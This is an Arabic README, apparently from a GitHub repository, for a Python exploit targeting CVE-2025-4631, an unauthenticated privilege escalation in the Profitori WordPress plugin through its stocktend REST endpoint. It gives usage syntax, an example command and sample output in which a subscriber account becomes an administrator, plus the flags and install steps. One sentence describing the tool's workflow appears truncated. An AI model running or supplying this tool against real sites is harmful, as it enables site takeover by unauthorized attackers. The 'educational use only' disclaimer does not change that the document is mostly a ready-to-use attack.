
Profitori 2.0.6.0 - 2.1.1.3 - غياب التفويض المؤدي إلى تصعيد الامتيازات دون مصادقة
إضافة Profitori (الإصدارات من 2.0.6.0 إلى 2.1.1.3) معرّضة لـ تصعيد صلاحيات غير مصادَق عليه بسبب غياب فحص الصلاحيات في نقطة النهاية /wp-json/stocktend/v1/stocktend_object. وهذا يسمح للمهاجمين عن بُعد بتصعيد صلاحيات المستخدمين الحاليين (أو إنشاء مستخدمين جدد) من خلال التلاعب المباشر بحقل wp_capabilities الوصفي.
تقوم أداة الاستغلال هذه المكتوبة بلغة Python بأتمتة عملية تصعيد الصلاحيات من خلال:
readme.txt.إذا فشل فحص الإصدار، تستمر أداة الاستغلال بحذر مع إصدار تحذير.

usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!
[🧾] Updated User Information:
--------------------------------------
🆔 User ID : 3
👤 Username : subscriber
📧 Email : [email protected]
🪪 Display Name : Subscriber User
🔗 User URL :
🛡 Role Raw : a:1:{s:13:"administrator";b:1;}
[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub : https://github.com/Nxploited
📧 Email : [email protected]
requestsالتثبيت عبر:
pip install requests
هذه الأداة مقدمة لأغراض تعليمية واختبارات مصرّح بها فقط. أي إساءة استخدام لهذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها ممنوعة منعًا باتًا. المُنشئ غير مسؤول عن أي أضرار أو عواقب قانونية ناتجة عن الاستخدام غير السليم.
بواسطة: Nxploited ( Khaled_Alenazi )
| Flag | الوصف | مطلوب |
|---|
-u, --url | 🌐 الرابط الأساسي لموقع ووردبريس | ✅ نعم |
-id | 🆔 معرف المستخدم المراد تصعيد صلاحياته | ✅ نعم |
--email | 📧 بريد إلكتروني وهمي للعرض | ❌ لا |
--name | 👤 الاسم المعروض | ❌ لا |
--url_field | 🔗 حقل رابط المستخدم | ❌ لا |
--verbose | 🔍 طباعة استجابة JSON الكاملة | ❌ لا |